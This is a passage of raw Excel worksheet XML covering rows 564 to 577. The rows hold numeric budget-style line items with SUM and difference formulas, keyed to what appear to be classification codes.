      <c r="M564" s="17"/>
      <c r="N564" s="17"/>
      <c r="O564" s="17"/>
      <c r="P564" s="17"/>
      <c r="Q564" s="17"/>
      <c r="R564" s="17"/>
      <c r="S564" s="17"/>
      <c r="T564" s="17"/>
      <c r="U564" s="17"/>
      <c r="V564" s="17"/>
      <c r="W564" s="17"/>
      <c r="X564" s="17"/>
      <c r="Y564" s="17"/>
      <c r="Z564" s="17"/>
      <c r="AA564" s="17"/>
      <c r="AB564" s="17"/>
      <c r="AC564" s="17"/>
      <c r="AD564" s="17"/>
      <c r="AE564" s="17">
        <f t="shared" si="261"/>
        <v>0</v>
      </c>
      <c r="AF564" s="17">
        <f t="shared" si="261"/>
        <v>0</v>
      </c>
      <c r="AG564" s="17">
        <f t="shared" si="261"/>
        <v>0</v>
      </c>
      <c r="AH564" s="17">
        <f t="shared" si="261"/>
        <v>0</v>
      </c>
      <c r="AI564" s="17">
        <f t="shared" si="261"/>
        <v>0</v>
      </c>
      <c r="AJ564" s="17">
        <f t="shared" si="261"/>
        <v>0</v>
      </c>
      <c r="AK564" s="17">
        <f t="shared" si="261"/>
        <v>0</v>
      </c>
      <c r="AL564" s="17">
        <f t="shared" si="261"/>
        <v>0</v>
      </c>
      <c r="AM564" s="17">
        <f t="shared" si="261"/>
        <v>0</v>
      </c>
      <c r="AN564" s="17">
        <f t="shared" si="261"/>
        <v>0</v>
      </c>
      <c r="AO564" s="17">
        <f t="shared" si="261"/>
        <v>0</v>
      </c>
      <c r="AP564" s="17">
        <f t="shared" si="261"/>
        <v>0</v>
      </c>
    </row>
    <row r="565" ht="18" customHeight="1" spans="1:42">
      <c r="A565" s="10"/>
      <c r="B565" s="10"/>
      <c r="C565" s="31"/>
      <c r="D565" s="10">
        <v>2080115</v>
      </c>
      <c r="E565" s="16" t="s">
        <v>3388</v>
      </c>
      <c r="F565" s="14">
        <f t="shared" si="246"/>
        <v>0</v>
      </c>
      <c r="G565" s="17"/>
      <c r="H565" s="17"/>
      <c r="I565" s="17"/>
      <c r="J565" s="17"/>
      <c r="K565" s="17"/>
      <c r="L565" s="17"/>
      <c r="M565" s="17"/>
      <c r="N565" s="17"/>
      <c r="O565" s="17"/>
      <c r="P565" s="17"/>
      <c r="Q565" s="17"/>
      <c r="R565" s="17"/>
      <c r="S565" s="17"/>
      <c r="T565" s="17"/>
      <c r="U565" s="17"/>
      <c r="V565" s="17"/>
      <c r="W565" s="17"/>
      <c r="X565" s="17"/>
      <c r="Y565" s="17"/>
      <c r="Z565" s="17"/>
      <c r="AA565" s="17"/>
      <c r="AB565" s="17"/>
      <c r="AC565" s="17"/>
      <c r="AD565" s="17"/>
      <c r="AE565" s="17">
        <f t="shared" si="261"/>
        <v>0</v>
      </c>
      <c r="AF565" s="17">
        <f t="shared" si="261"/>
        <v>0</v>
      </c>
      <c r="AG565" s="17">
        <f t="shared" si="261"/>
        <v>0</v>
      </c>
      <c r="AH565" s="17">
        <f t="shared" si="261"/>
        <v>0</v>
      </c>
      <c r="AI565" s="17">
        <f t="shared" si="261"/>
        <v>0</v>
      </c>
      <c r="AJ565" s="17">
        <f t="shared" si="261"/>
        <v>0</v>
      </c>
      <c r="AK565" s="17">
        <f t="shared" si="261"/>
        <v>0</v>
      </c>
      <c r="AL565" s="17">
        <f t="shared" si="261"/>
        <v>0</v>
      </c>
      <c r="AM565" s="17">
        <f t="shared" si="261"/>
        <v>0</v>
      </c>
      <c r="AN565" s="17">
        <f t="shared" si="261"/>
        <v>0</v>
      </c>
      <c r="AO565" s="17">
        <f t="shared" si="261"/>
        <v>0</v>
      </c>
      <c r="AP565" s="17">
        <f t="shared" si="261"/>
        <v>0</v>
      </c>
    </row>
    <row r="566" ht="18" customHeight="1" spans="1:42">
      <c r="A566" s="10"/>
      <c r="B566" s="10"/>
      <c r="C566" s="28"/>
      <c r="D566" s="10">
        <v>2080116</v>
      </c>
      <c r="E566" s="16" t="s">
        <v>3389</v>
      </c>
      <c r="F566" s="14">
        <f t="shared" si="246"/>
        <v>0</v>
      </c>
      <c r="G566" s="17"/>
      <c r="H566" s="17"/>
      <c r="I566" s="17"/>
      <c r="J566" s="17"/>
      <c r="K566" s="17"/>
      <c r="L566" s="17"/>
      <c r="M566" s="17"/>
      <c r="N566" s="17"/>
      <c r="O566" s="17"/>
      <c r="P566" s="17"/>
      <c r="Q566" s="17"/>
      <c r="R566" s="17"/>
      <c r="S566" s="17"/>
      <c r="T566" s="17"/>
      <c r="U566" s="17"/>
      <c r="V566" s="17"/>
      <c r="W566" s="17"/>
      <c r="X566" s="17"/>
      <c r="Y566" s="17"/>
      <c r="Z566" s="17"/>
      <c r="AA566" s="17"/>
      <c r="AB566" s="17"/>
      <c r="AC566" s="17"/>
      <c r="AD566" s="17"/>
      <c r="AE566" s="17">
        <f t="shared" si="261"/>
        <v>0</v>
      </c>
      <c r="AF566" s="17">
        <f t="shared" si="261"/>
        <v>0</v>
      </c>
      <c r="AG566" s="17">
        <f t="shared" si="261"/>
        <v>0</v>
      </c>
      <c r="AH566" s="17">
        <f t="shared" si="261"/>
        <v>0</v>
      </c>
      <c r="AI566" s="17">
        <f t="shared" si="261"/>
        <v>0</v>
      </c>
      <c r="AJ566" s="17">
        <f t="shared" si="261"/>
        <v>0</v>
      </c>
      <c r="AK566" s="17">
        <f t="shared" si="261"/>
        <v>0</v>
      </c>
      <c r="AL566" s="17">
        <f t="shared" si="261"/>
        <v>0</v>
      </c>
      <c r="AM566" s="17">
        <f t="shared" si="261"/>
        <v>0</v>
      </c>
      <c r="AN566" s="17">
        <f t="shared" si="261"/>
        <v>0</v>
      </c>
      <c r="AO566" s="17">
        <f t="shared" si="261"/>
        <v>0</v>
      </c>
      <c r="AP566" s="17">
        <f t="shared" si="261"/>
        <v>0</v>
      </c>
    </row>
    <row r="567" ht="18" customHeight="1" spans="1:42">
      <c r="A567" s="10"/>
      <c r="B567" s="10"/>
      <c r="C567" s="28"/>
      <c r="D567" s="10">
        <v>2080150</v>
      </c>
      <c r="E567" s="16" t="s">
        <v>2539</v>
      </c>
      <c r="F567" s="14">
        <f t="shared" si="246"/>
        <v>0</v>
      </c>
      <c r="G567" s="17"/>
      <c r="H567" s="17"/>
      <c r="I567" s="17"/>
      <c r="J567" s="17"/>
      <c r="K567" s="17"/>
      <c r="L567" s="17"/>
      <c r="M567" s="17"/>
      <c r="N567" s="17"/>
      <c r="O567" s="17"/>
      <c r="P567" s="17"/>
      <c r="Q567" s="17"/>
      <c r="R567" s="17"/>
      <c r="S567" s="17"/>
      <c r="T567" s="17"/>
      <c r="U567" s="17"/>
      <c r="V567" s="17"/>
      <c r="W567" s="17"/>
      <c r="X567" s="17"/>
      <c r="Y567" s="17"/>
      <c r="Z567" s="17"/>
      <c r="AA567" s="17"/>
      <c r="AB567" s="17"/>
      <c r="AC567" s="17"/>
      <c r="AD567" s="17"/>
      <c r="AE567" s="17">
        <f t="shared" si="261"/>
        <v>0</v>
      </c>
      <c r="AF567" s="17">
        <f t="shared" si="261"/>
        <v>0</v>
      </c>
      <c r="AG567" s="17">
        <f t="shared" si="261"/>
        <v>0</v>
      </c>
      <c r="AH567" s="17">
        <f t="shared" si="261"/>
        <v>0</v>
      </c>
      <c r="AI567" s="17">
        <f t="shared" si="261"/>
        <v>0</v>
      </c>
      <c r="AJ567" s="17">
        <f t="shared" si="261"/>
        <v>0</v>
      </c>
      <c r="AK567" s="17">
        <f t="shared" si="261"/>
        <v>0</v>
      </c>
      <c r="AL567" s="17">
        <f t="shared" si="261"/>
        <v>0</v>
      </c>
      <c r="AM567" s="17">
        <f t="shared" si="261"/>
        <v>0</v>
      </c>
      <c r="AN567" s="17">
        <f t="shared" si="261"/>
        <v>0</v>
      </c>
      <c r="AO567" s="17">
        <f t="shared" si="261"/>
        <v>0</v>
      </c>
      <c r="AP567" s="17">
        <f t="shared" si="261"/>
        <v>0</v>
      </c>
    </row>
    <row r="568" ht="18" customHeight="1" spans="1:42">
      <c r="A568" s="10"/>
      <c r="B568" s="10"/>
      <c r="C568" s="28"/>
      <c r="D568" s="10">
        <v>2080199</v>
      </c>
      <c r="E568" s="16" t="s">
        <v>3390</v>
      </c>
      <c r="F568" s="14">
        <f t="shared" si="246"/>
        <v>115</v>
      </c>
      <c r="G568" s="17">
        <v>9</v>
      </c>
      <c r="H568" s="17"/>
      <c r="I568" s="17">
        <v>5</v>
      </c>
      <c r="J568" s="17">
        <v>8</v>
      </c>
      <c r="K568" s="17"/>
      <c r="L568" s="17">
        <v>8</v>
      </c>
      <c r="M568" s="17"/>
      <c r="N568" s="17">
        <v>9</v>
      </c>
      <c r="O568" s="17">
        <v>39</v>
      </c>
      <c r="P568" s="17"/>
      <c r="Q568" s="17">
        <v>29</v>
      </c>
      <c r="R568" s="17">
        <v>17</v>
      </c>
      <c r="S568" s="17">
        <v>8</v>
      </c>
      <c r="T568" s="17"/>
      <c r="U568" s="17"/>
      <c r="V568" s="17">
        <v>8</v>
      </c>
      <c r="W568" s="17"/>
      <c r="X568" s="17">
        <v>7</v>
      </c>
      <c r="Y568" s="17"/>
      <c r="Z568" s="17">
        <v>7</v>
      </c>
      <c r="AA568" s="17"/>
      <c r="AB568" s="17"/>
      <c r="AC568" s="17"/>
      <c r="AD568" s="17">
        <v>16</v>
      </c>
      <c r="AE568" s="17">
        <f t="shared" si="261"/>
        <v>1</v>
      </c>
      <c r="AF568" s="17">
        <f t="shared" si="261"/>
        <v>0</v>
      </c>
      <c r="AG568" s="17">
        <f t="shared" si="261"/>
        <v>5</v>
      </c>
      <c r="AH568" s="17">
        <f t="shared" si="261"/>
        <v>0</v>
      </c>
      <c r="AI568" s="17">
        <f t="shared" si="261"/>
        <v>0</v>
      </c>
      <c r="AJ568" s="17">
        <f t="shared" si="261"/>
        <v>1</v>
      </c>
      <c r="AK568" s="17">
        <f t="shared" si="261"/>
        <v>0</v>
      </c>
      <c r="AL568" s="17">
        <f t="shared" si="261"/>
        <v>2</v>
      </c>
      <c r="AM568" s="17">
        <f t="shared" si="261"/>
        <v>39</v>
      </c>
      <c r="AN568" s="17">
        <f t="shared" si="261"/>
        <v>0</v>
      </c>
      <c r="AO568" s="17">
        <f t="shared" si="261"/>
        <v>29</v>
      </c>
      <c r="AP568" s="17">
        <f t="shared" si="261"/>
        <v>1</v>
      </c>
    </row>
    <row r="569" ht="18" customHeight="1" spans="1:42">
      <c r="A569" s="10"/>
      <c r="B569" s="10"/>
      <c r="C569" s="28"/>
      <c r="D569" s="10">
        <v>20802</v>
      </c>
      <c r="E569" s="11" t="s">
        <v>3391</v>
      </c>
      <c r="F569" s="14">
        <f t="shared" si="246"/>
        <v>3</v>
      </c>
      <c r="G569" s="12">
        <f t="shared" ref="G569:R569" si="262">SUM(G570:G576)</f>
        <v>1713</v>
      </c>
      <c r="H569" s="12">
        <f t="shared" si="262"/>
        <v>532</v>
      </c>
      <c r="I569" s="12">
        <f t="shared" si="262"/>
        <v>0</v>
      </c>
      <c r="J569" s="12">
        <f t="shared" si="262"/>
        <v>0</v>
      </c>
      <c r="K569" s="12">
        <f t="shared" si="262"/>
        <v>0</v>
      </c>
      <c r="L569" s="12">
        <f t="shared" si="262"/>
        <v>3</v>
      </c>
      <c r="M569" s="12">
        <f t="shared" si="262"/>
        <v>0</v>
      </c>
      <c r="N569" s="12">
        <f t="shared" si="262"/>
        <v>0</v>
      </c>
      <c r="O569" s="12">
        <f t="shared" si="262"/>
        <v>0</v>
      </c>
      <c r="P569" s="12">
        <f t="shared" si="262"/>
        <v>0</v>
      </c>
      <c r="Q569" s="12">
        <f t="shared" si="262"/>
        <v>0</v>
      </c>
      <c r="R569" s="12">
        <f t="shared" si="262"/>
        <v>0</v>
      </c>
      <c r="S569" s="12">
        <v>1491</v>
      </c>
      <c r="T569" s="12">
        <v>480</v>
      </c>
      <c r="U569" s="12">
        <v>0</v>
      </c>
      <c r="V569" s="12">
        <v>0</v>
      </c>
      <c r="W569" s="12">
        <v>0</v>
      </c>
      <c r="X569" s="12">
        <v>1</v>
      </c>
      <c r="Y569" s="12">
        <v>0</v>
      </c>
      <c r="Z569" s="12">
        <v>0</v>
      </c>
      <c r="AA569" s="12">
        <v>0</v>
      </c>
      <c r="AB569" s="12">
        <v>0</v>
      </c>
      <c r="AC569" s="12">
        <v>0</v>
      </c>
      <c r="AD569" s="12">
        <v>0</v>
      </c>
      <c r="AE569" s="12">
        <f t="shared" ref="AE569:AP569" si="263">SUM(AE570:AE576)</f>
        <v>222</v>
      </c>
      <c r="AF569" s="12">
        <f t="shared" si="263"/>
        <v>52</v>
      </c>
      <c r="AG569" s="12">
        <f t="shared" si="263"/>
        <v>0</v>
      </c>
      <c r="AH569" s="12">
        <f t="shared" si="263"/>
        <v>0</v>
      </c>
      <c r="AI569" s="12">
        <f t="shared" si="263"/>
        <v>0</v>
      </c>
      <c r="AJ569" s="12">
        <f t="shared" si="263"/>
        <v>2</v>
      </c>
      <c r="AK569" s="12">
        <f t="shared" si="263"/>
        <v>0</v>
      </c>
      <c r="AL569" s="12">
        <f t="shared" si="263"/>
        <v>0</v>
      </c>
      <c r="AM569" s="12">
        <f t="shared" si="263"/>
        <v>0</v>
      </c>
      <c r="AN569" s="12">
        <f t="shared" si="263"/>
        <v>0</v>
      </c>
      <c r="AO569" s="12">
        <f t="shared" si="263"/>
        <v>0</v>
      </c>
      <c r="AP569" s="12">
        <f t="shared" si="263"/>
        <v>0</v>
      </c>
    </row>
    <row r="570" ht="18" customHeight="1" spans="1:42">
      <c r="A570" s="10"/>
      <c r="B570" s="10"/>
      <c r="C570" s="28"/>
      <c r="D570" s="10">
        <v>2080201</v>
      </c>
      <c r="E570" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F570" s="14">
        <f t="shared" si="246"/>
        <v>1</v>
      </c>
      <c r="G570" s="17"/>
      <c r="H570" s="17"/>
      <c r="I570" s="17"/>
      <c r="J570" s="17"/>
      <c r="K570" s="17"/>
      <c r="L570" s="17">
        <v>1</v>
      </c>
      <c r="M570" s="17"/>
      <c r="N570" s="17"/>
      <c r="O570" s="17"/>
      <c r="P570" s="17"/>
      <c r="Q570" s="17"/>
      <c r="R570" s="17"/>
      <c r="S570" s="17"/>
      <c r="T570" s="17"/>
      <c r="U570" s="17"/>
      <c r="V570" s="17"/>
      <c r="W570" s="17"/>
      <c r="X570" s="17">
        <v>1</v>
      </c>
      <c r="Y570" s="17"/>
      <c r="Z570" s="17"/>
      <c r="AA570" s="17"/>
      <c r="AB570" s="17"/>
      <c r="AC570" s="17"/>
      <c r="AD570" s="17"/>
      <c r="AE570" s="17">
        <f t="shared" ref="AE570:AP576" si="264">G570-S570</f>
        <v>0</v>
      </c>
      <c r="AF570" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
      <c r="AG570" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
      <c r="AH570" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
      <c r="AI570" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
      <c r="AJ570" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
      <c r="AK570" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
      <c r="AL570" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
      <c r="AM570" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
      <c r="AN570" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
      <c r="AO570" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
      <c r="AP570" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
    </row>
    <row r="571" ht="18" customHeight="1" spans="1:42">
      <c r="A571" s="10"/>
      <c r="B571" s="10"/>
      <c r="C571" s="28"/>
      <c r="D571" s="10">
        <v>2080202</v>
      </c>
      <c r="E571" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F571" s="14">
        <f t="shared" si="246"/>
        <v>0</v>
      </c>
      <c r="G571" s="17"/>
      <c r="H571" s="17"/>
      <c r="I571" s="17"/>
      <c r="J571" s="17"/>
      <c r="K571" s="17"/>
      <c r="L571" s="17"/>
      <c r="M571" s="17"/>
      <c r="N571" s="17"/>
      <c r="O571" s="17"/>
      <c r="P571" s="17"/>
      <c r="Q571" s="17"/>
      <c r="R571" s="17"/>
      <c r="S571" s="17"/>
      <c r="T571" s="17"/>
      <c r="U571" s="17"/>
      <c r="V571" s="17"/>
      <c r="W571" s="17"/>
      <c r="X571" s="17"/>
      <c r="Y571" s="17"/>
      <c r="Z571" s="17"/>
      <c r="AA571" s="17"/>
      <c r="AB571" s="17"/>
      <c r="AC571" s="17"/>
      <c r="AD571" s="17"/>
      <c r="AE571" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
      <c r="AF571" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
      <c r="AG571" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
      <c r="AH571" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
      <c r="AI571" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
      <c r="AJ571" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
      <c r="AK571" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
      <c r="AL571" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
      <c r="AM571" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
      <c r="AN571" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
      <c r="AO571" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
      <c r="AP571" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
    </row>
    <row r="572" ht="18" customHeight="1" spans="1:42">
      <c r="A572" s="10"/>
      <c r="B572" s="10"/>
      <c r="C572" s="28"/>
      <c r="D572" s="10">
        <v>2080203</v>
      </c>
      <c r="E572" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F572" s="14">
        <f t="shared" si="246"/>
        <v>0</v>
      </c>
      <c r="G572" s="17"/>
      <c r="H572" s="17"/>
      <c r="I572" s="17"/>
      <c r="J572" s="17"/>
      <c r="K572" s="17"/>
      <c r="L572" s="17"/>
      <c r="M572" s="17"/>
      <c r="N572" s="17"/>
      <c r="O572" s="17"/>
      <c r="P572" s="17"/>
      <c r="Q572" s="17"/>
      <c r="R572" s="17"/>
      <c r="S572" s="17"/>
      <c r="T572" s="17"/>
      <c r="U572" s="17"/>
      <c r="V572" s="17"/>
      <c r="W572" s="17"/>
      <c r="X572" s="17"/>
      <c r="Y572" s="17"/>
      <c r="Z572" s="17"/>
      <c r="AA572" s="17"/>
      <c r="AB572" s="17"/>
      <c r="AC572" s="17"/>
      <c r="AD572" s="17"/>
      <c r="AE572" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
      <c r="AF572" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
      <c r="AG572" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
      <c r="AH572" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
      <c r="AI572" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
      <c r="AJ572" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
      <c r="AK572" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
      <c r="AL572" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
      <c r="AM572" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
      <c r="AN572" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
      <c r="AO572" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
      <c r="AP572" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
    </row>
    <row r="573" ht="18" customHeight="1" spans="1:42">
      <c r="A573" s="10"/>
      <c r="B573" s="10"/>
      <c r="C573" s="28"/>
      <c r="D573" s="10">
        <v>2080206</v>
      </c>
      <c r="E573" s="16" t="s">
        <v>3392</v>
      </c>
      <c r="F573" s="14">
        <f t="shared" si="246"/>
        <v>0</v>
      </c>
      <c r="G573" s="17"/>
      <c r="H573" s="17"/>
      <c r="I573" s="17"/>
      <c r="J573" s="17"/>
      <c r="K573" s="17"/>
      <c r="L573" s="17"/>
      <c r="M573" s="17"/>
      <c r="N573" s="17"/>
      <c r="O573" s="17"/>
      <c r="P573" s="17"/>
      <c r="Q573" s="17"/>
      <c r="R573" s="17"/>
      <c r="S573" s="17"/>
      <c r="T573" s="17"/>
      <c r="U573" s="17"/>
      <c r="V573" s="17"/>
      <c r="W573" s="17"/>
      <c r="X573" s="17"/>
      <c r="Y573" s="17"/>
      <c r="Z573" s="17"/>
      <c r="AA573" s="17"/>
      <c r="AB573" s="17"/>
      <c r="AC573" s="17"/>
      <c r="AD573" s="17"/>
      <c r="AE573" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
      <c r="AF573" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
      <c r="AG573" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
      <c r="AH573" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
      <c r="AI573" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
      <c r="AJ573" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
      <c r="AK573" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
      <c r="AL573" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
      <c r="AM573" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
      <c r="AN573" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
      <c r="AO573" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
      <c r="AP573" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
    </row>
    <row r="574" ht="18" customHeight="1" spans="1:42">
      <c r="A574" s="10"/>
      <c r="B574" s="10"/>
      <c r="C574" s="28"/>
      <c r="D574" s="10">
        <v>2080207</v>
      </c>
      <c r="E574" s="16" t="s">
        <v>3393</v>
      </c>
      <c r="F574" s="14">
        <f t="shared" si="246"/>
        <v>0</v>
      </c>
      <c r="G574" s="17"/>
      <c r="H574" s="17"/>
      <c r="I574" s="17"/>
      <c r="J574" s="17"/>
      <c r="K574" s="17"/>
      <c r="L574" s="17"/>
      <c r="M574" s="17"/>
      <c r="N574" s="17"/>
      <c r="O574" s="17"/>
      <c r="P574" s="17"/>
      <c r="Q574" s="17"/>
      <c r="R574" s="17"/>
      <c r="S574" s="17"/>
      <c r="T574" s="17"/>
      <c r="U574" s="17"/>
      <c r="V574" s="17"/>
      <c r="W574" s="17"/>
      <c r="X574" s="17"/>
      <c r="Y574" s="17"/>
      <c r="Z574" s="17"/>
      <c r="AA574" s="17"/>
      <c r="AB574" s="17"/>
      <c r="AC574" s="17"/>
      <c r="AD574" s="17"/>
      <c r="AE574" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
      <c r="AF574" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
      <c r="AG574" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
      <c r="AH574" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
      <c r="AI574" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
      <c r="AJ574" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
      <c r="AK574" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
      <c r="AL574" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
      <c r="AM574" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
      <c r="AN574" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
      <c r="AO574" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
      <c r="AP574" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
    </row>
    <row r="575" ht="18" customHeight="1" spans="1:42">
      <c r="A575" s="10"/>
      <c r="B575" s="10"/>
      <c r="C575" s="28"/>
      <c r="D575" s="10">
        <v>2080208</v>
      </c>
      <c r="E575" s="16" t="s">
        <v>3394</v>
      </c>
      <c r="F575" s="14">
        <f t="shared" si="246"/>
        <v>0</v>
      </c>
      <c r="G575" s="17">
        <v>1713</v>
      </c>
      <c r="H575" s="17">
        <v>532</v>
      </c>
      <c r="I575" s="17"/>
      <c r="J575" s="17"/>
      <c r="K575" s="17"/>
      <c r="L575" s="17"/>
      <c r="M575" s="17"/>
      <c r="N575" s="17"/>
      <c r="O575" s="17"/>
      <c r="P575" s="17"/>
      <c r="Q575" s="17"/>
      <c r="R575" s="17"/>
      <c r="S575" s="17">
        <v>1490</v>
      </c>
      <c r="T575" s="17">
        <v>480</v>
      </c>
      <c r="U575" s="17"/>
      <c r="V575" s="17"/>
      <c r="W575" s="17"/>
      <c r="X575" s="17"/>
      <c r="Y575" s="17"/>
      <c r="Z575" s="17"/>
      <c r="AA575" s="17"/>
      <c r="AB575" s="17"/>
      <c r="AC575" s="17"/>
      <c r="AD575" s="17"/>
      <c r="AE575" s="17">
        <f t="shared" si="264"/>
        <v>223</v>
      </c>
      <c r="AF575" s="17">
        <f t="shared" si="264"/>
        <v>52</v>
      </c>
      <c r="AG575" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
      <c r="AH575" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
      <c r="AI575" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
      <c r="AJ575" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
      <c r="AK575" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
      <c r="AL575" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
      <c r="AM575" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
      <c r="AN575" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
      <c r="AO575" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
      <c r="AP575" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
    </row>
    <row r="576" ht="18" customHeight="1" spans="1:42">
      <c r="A576" s="10"/>
      <c r="B576" s="10"/>
      <c r="C576" s="28"/>
      <c r="D576" s="10">
        <v>2080299</v>
      </c>
      <c r="E576" s="16" t="s">
        <v>3395</v>
      </c>
      <c r="F576" s="14">
        <f t="shared" si="246"/>
        <v>2</v>
      </c>
      <c r="G576" s="17"/>
      <c r="H576" s="17"/>
      <c r="I576" s="17"/>
      <c r="J576" s="17"/>
      <c r="K576" s="17"/>
      <c r="L576" s="17">
        <v>2</v>
      </c>
      <c r="M576" s="17"/>
      <c r="N576" s="17"/>
      <c r="O576" s="17"/>
      <c r="P576" s="17"/>
      <c r="Q576" s="17"/>
      <c r="R576" s="17"/>
      <c r="S576" s="17">
        <v>1</v>
      </c>
      <c r="T576" s="17"/>
      <c r="U576" s="17"/>
      <c r="V576" s="17"/>
      <c r="W576" s="17"/>
      <c r="X576" s="17"/>
      <c r="Y576" s="17"/>
      <c r="Z576" s="17"/>
      <c r="AA576" s="17"/>
      <c r="AB576" s="17"/>
      <c r="AC576" s="17"/>
      <c r="AD576" s="17"/>
      <c r="AE576" s="17">
        <f t="shared" si="264"/>
        <v>-1</v>
      </c>
      <c r="AF576" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
      <c r="AG576" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
      <c r="AH576" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
      <c r="AI576" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
      <c r="AJ576" s="17">
        <f t="shared" si="264"/>
        <v>2</v>
      </c>
      <c r="AK576" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
      <c r="AL576" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
      <c r="AM576" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
      <c r="AN576" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
      <c r="AO576" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
      <c r="AP576" s="17">
        <f t="shared" si="264"/>
        <v>0</v>
      </c>
    </row>
    <row r="577" ht="18" customHeight="1" spans="1:42">
      <c r="A577" s="10"/>
      <c r="B577" s="10"/>
      <c r="C577" s="28"/>
      <c r="D577" s="10">
        <v>20804</v>
      </c>
      <c r="E577" s="11" t="s">
        <v>3396</v>
      </c>
      <c r="F577" s="14">
        <f t="shared" si="246"/>
        <v>0</v>
      </c>
      <c r="G577" s="12">
        <f t="shared" ref="G577:R577" si="265">G578</f>
        <v>0</v>
      </c>
      <c r="H577" s="12">
        <f t="shared" si="265"/>
        <v>0</v>
      </c>
      <c r="I577" s="12">
        <f t="shared" si="265"/>
        <v>0</v>
      </c>
      <c r="J577" s="12">
        <f t="shared" si="265"/>
        <v>0</v>
      </c>
      <c r="K577" s="12">
        <f t="shared" si="265"/>
        <v>0</v>
      </c>
      <c r="L577" s="12">
        <f t="shared" si="265"/>
        <v>0</v>
      </c>
      <c r="M577" s="12">
        <f t="shared" si="265"/>
        <v>0</v>
      </c>
      <c r="N577" s="12">
        <f t="shared" si="265"/>
        <v>0</v>
      </c>
      <c r="O577" s="12">
        <f t="shared" si="265"/>
        <v>0</v>
      </c>
      <c r="P577" s="12">
        <f t="shared" si="265"/>
        <v>0</v>
      </c>
      <c r="Q577" s="12">
        <f t="shared" si="265"/>
        <v>0</v>
